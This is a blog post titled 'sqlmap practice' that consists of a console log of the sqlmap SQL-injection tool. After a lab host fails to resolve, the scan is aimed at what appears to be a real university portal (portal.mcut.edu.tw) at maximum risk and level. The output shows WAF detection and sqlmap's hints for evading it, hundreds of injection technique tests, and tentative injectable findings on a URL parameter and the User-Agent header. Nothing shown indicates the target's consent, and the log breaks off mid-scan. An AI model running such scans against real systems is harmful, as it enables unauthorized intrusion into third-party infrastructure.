sqlmap練習

閱讀時間約 456 分鐘
Microsoft Windows [版本 10.0.19044.2604]
(c) Microsoft Corporation. 著作權所有,並保留一切權利。
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.conf
File "C:\Users\ricky\Desktop\sqlmap-dev\sqlmap.conf", line 7
url =
^
SyntaxError: invalid syntax
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py
[15:14:17] [CRITICAL] user aborted
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --batch --banner
___
__H__
___ ___[(]_____ ___ ___ {1.7.3#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:17:14 /2023-03-23/
[15:17:19] [CRITICAL] host 'debiandev' does not exist
[*] ending @ 15:17:19 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606
___
__H__
___ ___[']_____ ___ ___ {1.7.3#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:19:29 /2023-03-23/
[15:19:29] [INFO] testing connection to the target URL
[15:19:30] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:19:30] [INFO] testing if the target URL content is stable
[15:19:30] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] s
[15:19:47] [INFO] finding static words in longest matching part of dynamic page content
[15:19:47] [INFO] static words: '3102602362306428', 'administrator', 'consult', 'Please', 'Rejected', 'rejected', 'Request', 'requested', 'support', 'The', 'URL', 'was', 'with', 'Your', 'your'
please enter value for parameter 'string': administrator
[15:20:08] [INFO] testing if GET parameter 'thetime' is dynamic
[15:20:09] [WARNING] GET parameter 'thetime' does not appear to be dynamic
[15:20:09] [WARNING] heuristic (basic) test shows that GET parameter 'thetime' might not be injectable
[15:20:09] [INFO] testing for SQL injection on GET parameter 'thetime'
[15:20:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:20:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:20:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:20:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:20:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:20:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:20:15] [INFO] testing 'Generic inline queries'
[15:20:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:20:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:20:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:20:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:20:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:20:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:20:20] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[15:20:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:20:29] [WARNING] GET parameter 'thetime' does not seem to be injectable
[15:20:29] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 15:20:29 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 --risk 5
___
__H__
___ ___[.]_____ ___ ___ {1.7.3#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:20:44 /2023-03-23/
[15:20:44] [CRITICAL] value for option '--risk' must be an integer value from range [1, 3]
[*] ending @ 15:20:44 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u https://portal.mcut.edu.tw/index.do?thetime=1679555962606 --risk 3 --level 5
___
__H__
___ ___[.]_____ ___ ___ {1.7.3#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:20:52 /2023-03-23/
[15:20:53] [INFO] testing connection to the target URL
[15:20:53] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[15:20:53] [INFO] testing if the target URL content is stable
[15:20:53] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:20:56] [INFO] testing if GET parameter 'thetime' is dynamic
[15:20:56] [WARNING] GET parameter 'thetime' does not appear to be dynamic
[15:20:56] [WARNING] heuristic (basic) test shows that GET parameter 'thetime' might not be injectable
[15:20:56] [INFO] testing for SQL injection on GET parameter 'thetime'
[15:20:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:21:00] [INFO] GET parameter 'thetime' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:21:01] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Cubrid'
it looks like the back-end DBMS is 'Cubrid'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
[15:24:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:24:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:24:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:24:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:24:13] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:24:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:24:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:24:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:24:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:24:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:24:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:24:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:24:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:24:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:24:15] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:24:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:24:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:24:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:24:16] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:24:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:24:16] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[15:24:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[15:24:17] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[15:24:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[15:24:17] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[15:24:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:24:17] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[15:24:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:24:18] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:24:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:24:18] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:24:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[15:24:19] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[15:24:19] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'MonetDB OR error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'Vertica OR error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'IBM DB2 OR error-based - WHERE or HAVING clause'
[15:24:19] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:24:19] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:24:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:24:19] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:24:19] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:24:19] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:24:19] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:24:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:24:19] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:24:19] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:24:19] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:24:19] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:24:19] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[15:24:19] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[15:24:19] [INFO] testing 'Oracle error-based - Parameter replace'
[15:24:19] [INFO] testing 'Firebird error-based - Parameter replace'
[15:24:19] [INFO] testing 'IBM DB2 error-based - Parameter replace'
[15:24:19] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[15:24:19] [INFO] testing 'Generic inline queries'
[15:24:19] [INFO] testing 'MySQL inline queries'
[15:24:19] [INFO] testing 'PostgreSQL inline queries'
[15:24:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:24:20] [INFO] testing 'Oracle inline queries'
[15:24:20] [INFO] testing 'SQLite inline queries'
[15:24:20] [INFO] testing 'Firebird inline queries'
[15:24:20] [INFO] testing 'ClickHouse inline queries'
[15:24:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:24:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:24:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:24:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:24:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:24:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:24:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:24:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:24:20] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:24:20] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:24:20] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:24:20] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[15:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE)'
[15:24:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:24:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[15:24:20] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[15:24:20] [INFO] testing 'Oracle stacked queries (heavy query)'
[15:24:20] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[15:24:20] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[15:24:20] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[15:24:20] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[15:24:20] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[15:24:20] [INFO] testing 'IBM DB2 stacked queries (heavy query)'
[15:24:20] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:24:21] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:24:21] [INFO] testing 'Firebird stacked queries (heavy query - comment)'
[15:24:21] [INFO] testing 'Firebird stacked queries (heavy query)'
[15:24:21] [INFO] testing 'SAP MaxDB stacked queries (heavy query - comment)'
[15:24:21] [INFO] testing 'SAP MaxDB stacked queries (heavy query)'
[15:24:21] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[15:24:21] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[15:24:21] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[15:24:21] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query)'
[15:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:24:21] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:24:21] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:24:21] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:24:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:24:22] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:24:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:24:22] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:24:22] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:24:22] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:24:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:24:23] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:24:23] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:24:23] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:24:23] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:24:23] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:24:24] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:24:24] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:24:24] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:24:24] [INFO] testing 'MySQL OR time-based blind (ELT)'
[15:24:24] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[15:24:24] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[15:24:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:24:25] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:24:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:24:25] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[15:24:25] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:24:25] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[15:24:25] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[15:24:26] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[15:24:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[15:24:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF - comment)'
[15:24:26] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[15:24:26] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[15:24:27] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[15:24:27] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)'
[15:24:27] [INFO] testing 'Oracle AND time-based blind'
[15:24:27] [INFO] testing 'Oracle OR time-based blind'
[15:24:27] [INFO] testing 'Oracle AND time-based blind (comment)'
[15:24:27] [INFO] testing 'Oracle OR time-based blind (comment)'
[15:24:27] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[15:24:28] [INFO] testing 'Oracle OR time-based blind (heavy query)'
[15:24:28] [INFO] testing 'Oracle AND time-based blind (heavy query - comment)'
[15:24:28] [INFO] testing 'Oracle OR time-based blind (heavy query - comment)'
[15:24:28] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[15:24:28] [INFO] testing 'IBM DB2 OR time-based blind (heavy query)'
[15:24:28] [INFO] testing 'IBM DB2 AND time-based blind (heavy query - comment)'
[15:24:29] [INFO] testing 'IBM DB2 OR time-based blind (heavy query - comment)'
[15:24:29] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:24:29] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:24:29] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
[15:24:29] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
[15:24:29] [INFO] testing 'Firebird >= 2.0 AND time-based blind (heavy query)'
[15:24:30] [INFO] testing 'Firebird >= 2.0 OR time-based blind (heavy query)'
[15:24:30] [INFO] testing 'Firebird >= 2.0 AND time-based blind (heavy query - comment)'
[15:24:30] [INFO] testing 'Firebird >= 2.0 OR time-based blind (heavy query - comment)'
[15:24:30] [INFO] testing 'SAP MaxDB AND time-based blind (heavy query)'
[15:24:30] [INFO] testing 'SAP MaxDB OR time-based blind (heavy query)'
[15:24:30] [INFO] testing 'SAP MaxDB AND time-based blind (heavy query - comment)'
[15:24:30] [INFO] testing 'SAP MaxDB OR time-based blind (heavy query - comment)'
[15:24:31] [INFO] testing 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)'
[15:24:31] [INFO] testing 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)'
[15:24:31] [INFO] testing 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)'
[15:24:31] [INFO] testing 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)'
[15:24:31] [INFO] testing 'HSQLDB > 2.0 AND time-based blind (heavy query)'
[15:24:32] [INFO] testing 'HSQLDB > 2.0 OR time-based blind (heavy query)'
[15:24:32] [INFO] testing 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)'
[15:24:32] [INFO] testing 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)'
[15:24:32] [INFO] testing 'Informix AND time-based blind (heavy query)'
[15:24:32] [INFO] testing 'Informix OR time-based blind (heavy query)'
[15:24:33] [INFO] testing 'Informix AND time-based blind (heavy query - comment)'
[15:24:33] [INFO] testing 'Informix OR time-based blind (heavy query - comment)'
[15:24:33] [INFO] testing 'ClickHouse AND time-based blind (heavy query)'
[15:24:33] [INFO] testing 'ClickHouse OR time-based blind (heavy query)'
[15:24:33] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:24:33] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:24:33] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[15:24:33] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[15:24:33] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[15:24:33] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[15:24:33] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[15:24:33] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[15:24:33] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[15:24:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[15:24:33] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[15:24:33] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[15:24:33] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[15:24:33] [INFO] testing 'Oracle time-based blind - Parameter replace (heavy queries)'
[15:24:33] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'Firebird time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'SAP MaxDB time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'IBM DB2 time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'Informix time-based blind - Parameter replace (heavy query)'
[15:24:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:24:33] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:24:33] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:24:33] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:24:33] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:24:33] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:24:33] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:24:33] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:24:33] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:24:33] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:24:34] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[15:24:34] [INFO] checking if the injection point on GET parameter 'thetime' is a false positive
[15:24:34] [WARNING] false positive or unexploitable injection point detected
[15:24:34] [WARNING] GET parameter 'thetime' does not seem to be injectable
[15:24:34] [INFO] testing if parameter 'User-Agent' is dynamic
[15:24:34] [INFO] parameter 'User-Agent' appears to be dynamic
[15:24:34] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[15:24:34] [INFO] testing for SQL injection on parameter 'User-Agent'
[15:24:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:24:43] [INFO] parameter 'User-Agent' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:24:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:24:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:24:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:24:43] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:24:43] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:24:44] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:24:44] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:24:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:24:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:24:44] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:24:44] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:24:44] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:24:45] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:24:45] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:24:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:24:45] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:24:45] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:24:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:24:46] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:24:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:24:46] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
